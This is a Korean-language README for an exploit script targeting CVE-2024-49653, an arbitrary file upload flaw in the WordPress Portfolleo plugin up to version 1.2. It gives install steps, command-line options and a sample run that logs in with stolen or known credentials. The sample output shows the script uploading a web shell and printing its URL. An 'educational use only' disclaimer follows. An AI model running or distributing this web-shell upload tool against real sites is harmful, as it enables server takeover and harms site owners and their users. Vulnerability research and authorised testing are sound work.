
WordPress Portfolleo 플러그인 <= 1.2 - 임의 파일 업로드 취약점
제목: WordPress Portfolleo 플러그인 <= 1.2 - 임의 파일 업로드 취약점
설명:
James Eggers Portfolleo의 portfolleo에 있는 위험한 유형의 파일 무제한 업로드 취약점으로 인해 웹 서버에 웹 셸을 업로드할 수 있습니다. 이 문제는 Portfolleo 버전 n/a부터 1.2까지 영향을 미칩니다.
더 알아보기:
CVSS 점수:
이 스크립트는 WordPress Portfolleo 플러그인(버전 <= 1.2)의 임의 파일 업로드 취약점을 악용하여 웹 셸을 업로드합니다.
스크립트를 실행하려면 다음이 설치되어 있어야 합니다:
requests 라이브러리beautifulsoup4 라이브러리다음 명령으로 필요한 라이브러리를 설치할 수 있습니다:
pip install requests beautifulsoup4
다음 옵션을 사용하여 스크립트를 실행하세요:
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of the site (e.g. http://target/wordpress)
-U, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
스크립트가 성공적으로 실행되면 다음과 같은 출력이 표시됩니다:
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
이 스크립트는 교육 목적으로만 제공됩니다. 저자는 불법 활동에 이 스크립트를 사용하는 것을 용납하지 않습니다. 책임감 있게 사용하고 명시적 테스트 허가를 받은 시스템에서만 사용하세요.
제작: Nxploited | Khaled Alenazi